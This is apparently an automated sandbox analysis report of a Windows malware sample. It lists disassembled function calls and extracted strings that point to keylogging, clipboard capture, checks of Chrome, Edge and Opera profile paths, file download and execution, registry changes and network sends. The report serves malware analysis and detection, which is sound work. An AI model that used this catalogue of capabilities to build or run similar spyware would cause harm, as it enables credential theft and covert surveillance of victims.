                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                          • String ID:
                                                                                          • API String ID: 1761009282-0
                                                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                          APIs
                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorHandling__start
                                                                                          • String ID: pow
                                                                                          • API String ID: 3213639722-2276729525
                                                                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                                                          • String ID: NG
                                                                                          • API String ID: 3114080316-1651712548
                                                                                          • Opcode ID: a71d6f0dd6dcc93da5adf4ebdb912733ea44dcd57d8ae765127999729c86df5a
                                                                                          • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                          • Opcode Fuzzy Hash: a71d6f0dd6dcc93da5adf4ebdb912733ea44dcd57d8ae765127999729c86df5a
                                                                                          • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                          Strings
                                                                                          • /sort "Visit Time" /stext ", xrefs: 004040B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                          • String ID: /sort "Visit Time" /stext "
                                                                                          • API String ID: 368326130-1573945896
                                                                                          • Opcode ID: 38603f56d146c6edc1649b327761de0d025e6f1c59de35fee92e20854b51a343
                                                                                          • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                          • Opcode Fuzzy Hash: 38603f56d146c6edc1649b327761de0d025e6f1c59de35fee92e20854b51a343
                                                                                          • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                          APIs
                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                          • String ID: image/jpeg
                                                                                          • API String ID: 1291196975-3785015651
                                                                                          • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                          • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                          • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                          • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                          APIs
                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer__onexit
                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                          • API String ID: 1881088180-3686566968
                                                                                          • Opcode ID: ff1494b0bb0d887acac5e8b0ebc29097e9756416d4b6e07dc10a2d628bf0c193
                                                                                          • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                          • Opcode Fuzzy Hash: ff1494b0bb0d887acac5e8b0ebc29097e9756416d4b6e07dc10a2d628bf0c193
                                                                                          • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                          APIs
                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 0-711371036
                                                                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00416330
                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                            • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _wcslen$CloseCreateValue
                                                                                          • String ID: !D@$okmode
                                                                                          • API String ID: 3411444782-1942679189
                                                                                          • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                                          • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                          • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                                          • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                          APIs
                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                          • String ID: image/png
                                                                                          • API String ID: 1291196975-2966254431
                                                                                          • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                          • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                          • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                          • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                          Strings
                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                          • API String ID: 481472006-1507639952
                                                                                          • Opcode ID: c39db9322a8ab698ab6c6fe4d517d63c6f84dc46af59211586e7c92f61b52e84
                                                                                          • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                          • Opcode Fuzzy Hash: c39db9322a8ab698ab6c6fe4d517d63c6f84dc46af59211586e7c92f61b52e84
                                                                                          • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                          APIs
                                                                                          • Sleep.KERNEL32 ref: 0041667B
                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DownloadFileSleep
                                                                                          • String ID: !D@
                                                                                          • API String ID: 1931167962-604454484
                                                                                          • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                                          • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                          • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                                          • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                                                          • API String ID: 481472006-2430845779
                                                                                          • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                                          • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                          • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                                          • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                          APIs
                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                          • String ID: Online Keylogger Stopped
                                                                                          • API String ID: 1623830855-1496645233
                                                                                          • Opcode ID: 1a9fb93e295ecde7430af69949d9fcd4e66a132cb674e587e4338cf96b5e1dd8
                                                                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                          • Opcode Fuzzy Hash: 1a9fb93e295ecde7430af69949d9fcd4e66a132cb674e587e4338cf96b5e1dd8
                                                                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                          APIs
                                                                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocaleValid
                                                                                          • String ID: IsValidLocaleName$kKD
                                                                                          • API String ID: 1901932003-3269126172
                                                                                          • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                          • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                          • API String ID: 1174141254-4188645398
                                                                                          • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                          • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                          • API String ID: 1174141254-2800177040
                                                                                          • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                          • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                                                          • API String ID: 1174141254-1629609700
                                                                                          • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                          • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                          • String ID: [AltL]$[AltR]
                                                                                          • API String ID: 2738857842-2658077756
                                                                                          • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                          • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteShell
                                                                                          • String ID: !D@$open
                                                                                          • API String ID: 587946157-1586967515
                                                                                          • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                          • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State
                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                          • API String ID: 1649606143-2446555240
                                                                                          • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                          • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                          APIs
                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
